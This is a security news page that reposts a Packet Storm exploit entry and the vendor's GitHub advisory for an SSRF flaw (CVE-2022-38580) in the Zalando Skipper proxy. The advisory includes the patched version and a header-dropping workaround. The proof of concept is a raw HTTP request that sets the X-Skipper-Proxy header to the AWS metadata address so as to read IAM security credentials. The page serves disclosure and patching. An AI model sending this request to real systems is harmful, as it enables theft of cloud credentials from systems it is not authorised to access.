Security
Headlines
HeadlinesLatestCVEs

Headline

X-Skipper-Proxy 0.13.237 Server-Side Request Forgery

X-Skipper-Proxy version 0.13.237 suffers from a server-side request forgery vulnerability.

Packet Storm
#vulnerability#web#windows#apple#linux#git#ssrf#aws#auth#chrome#webkit
#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)#Date: 24/10/2022#Exploit Author: Hosein Vita & Milad Fadavvi#Vendor Homepage: https://github.com/zalando/skipper#Software Link: https://github.com/zalando/skipper#Version: < v0.13.237#Tested on: Linux#CVE: CVE-2022-38580Summary:Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.Proof Of Concept:1- Add header "X-Skipper-Proxy"  to your request2- Add the aws metadata to the pathGET /latest/meta-data/iam/security-credentials HTTP/1.1Host: yourskipperdomain.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36X-Skipper-Proxy: http://169.254.169.254Connection: closeReference:https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2

Related news

GHSA-f2rj-m42r-6jm2: Skipper vulnerable to SSRF via X-Skipper-Proxy

### Impact Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request. ### Patches The problem was patched in version https://github.com/zalando/skipper/releases/tag/v0.13.237. Users need to upgrade to skipper `>=v0.13.237`. ### Workarounds Use `dropRequestHeader("X-Skipper-Proxy")` filter ### References https://github.com/zalando/skipper/releases/tag/v0.13.237 ### For more information If you have any questions or comments about this advisory: * Open an issue in https://github.com/zalando/skipper/issues/new/choose * Chat with us in slack: https://app.slack.com/client/T029RQSE6/C82Q5JNH5

CVE-2022-38580

Zalando Skipper v0.13.236 is vulnerable to Server-Side Request Forgery (SSRF).

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6